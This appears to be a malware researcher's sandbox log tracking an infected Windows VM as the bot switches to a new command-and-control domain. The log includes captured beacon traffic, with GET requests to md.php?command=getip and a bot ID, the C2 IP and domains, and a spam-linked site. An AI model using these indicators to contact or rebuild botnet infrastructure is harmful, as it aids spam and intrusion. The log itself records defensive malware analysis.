The computer froze yesterday around 22hs.
started win9 already infected with e515267ba19417974a63b51e4f7dd9e9.
Some days ago, the domain papausafr.com stop answering. A little bit after Mon, 13 Apr 2015 14:04:11 GMT, in the real time. (04:07:42.825257 in the pcap time) So I will reboot it to see if it gets a new domain.
Rebooted win9. Same pcap file
It seems that is worked! It is asking for a new domain solocoufandle.com, and send some GET
22:22:15.343895 tcp 10.0.2.109 49158 -> 37.187.245.14 80 SRPA_SPA 528 431935 s[120]=GET /viber.php HTTP/1.1..User-Agent: pb..Host: solocoufandle.com..Cache-Control: no-cache....GET /md.php?command=getip H d[120]=HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Mon, 20 Apr 2015 09:37:45 GMT..Content-Type: text/html..Transfer-Encoding: s[300]=GET /viber.php HTTP/1.1..User-Agent: pb..Host: solocoufandle.com..Cache-Control: no-cache....GET /md.php?command=getip HTTP/1.1..User-Agent: pb..Host: solocoufandle.com..Cache-Control: no-cache....GET /md.php?command=ghl&id=1494363983 HTTP/1.1..User-Agent: pb..Host: solocoufandle.com..Cache-Control: d[300]=HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Mon, 20 Apr 2015 09:37:45 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.4.37....1f..http://solocoufandle.com/md.php..0....HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Mon, 20 Apr 2015 09:37:45 GMT..CIt start verifing email addresses
It start sending SPAM.
We downloaded some of the web pages linked in the spam. The link in the spam are different, but the link they link is mostly the same all the time: http://sansarall.ru/. And we started another capture (win8) accessing it.
poweroff